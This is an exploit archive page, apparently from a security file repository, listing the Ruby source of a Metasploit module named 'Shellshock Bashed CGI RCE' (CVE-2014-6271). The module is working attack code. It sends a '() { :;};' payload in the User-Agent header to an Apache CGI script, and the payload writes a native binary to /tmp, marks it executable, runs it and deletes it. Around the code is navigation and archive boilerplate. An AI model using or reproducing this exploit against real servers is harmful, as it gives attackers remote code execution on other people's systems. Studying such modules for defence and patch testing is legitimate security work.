Shellshock Bashed CGI RCE

Shellshock Bashed CGI RCE: Posted Oct 3, 2014; Authored by Fady Mohamed Osman, Stephane Chazelas | Site metasploit.com; This Metasploit module exploits the shellshock vulnerability in apache cgi. It allows you to execute any metasploit payload you want.; tags | exploit, cgi; advisories | CVE-2014-6271; SHA-256 | a864c843ce6ef903a561a68316c0959dd2b138cad93a26d0f8f6d85e6d98db5d; Download | Favorite | View

Shellshock Bashed CGI RCE

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Shellshock Bashed CGI RCE',
      'Description'    => %q{
          This module exploits the shellshock vulnerability in apache cgi. It allows you to
        excute any metasploit payload you want.
      },
      'Author'         =>
        [
            'Stephane Chazelas',  # vuln discovery
            'Fady Mohamed Osman'  # Metasploit module f.othman at zinad.net
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2014-6271' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "",
        },
        'Platform' => 'linux',
        'Arch'         => ARCH_X86,
        'Targets'        =>
        [
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
        'DefaultTarget'  => 0,
        'DisclosureDate' => 'Aug 13 2014'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The CGI url', '/cgi-bin/test.sh']) ,
        OptString.new('FILEPATH', [true, 'The url ', '/tmp'])
      ], self.class)
  end

  def exploit
    @payload_name = "#{rand_text_alpha(5)}"
    full_path = datastore['FILEPATH'] + '/' + @payload_name
    payload_exe = generate_payload_exe
    if payload_exe.blank?
      fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
    end
    peer = "#{rhost}:#{rport}"
    print_status("#{peer} - Creating payload #{full_path}")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => datastore['TARGETURI'],
      'agent'    => "() { :;}; /bin/bash -c \"" + "printf " + "\'" + Rex::Text.hexify(payload_exe).gsub("\n",'') + "\'" +  "> #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};\""
    })
  end
end

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Shellshock Bashed CGI RCE

Shellshock Bashed CGI RCE

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Shellshock Bashed CGI RCE

Share This

Shellshock Bashed CGI RCE

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems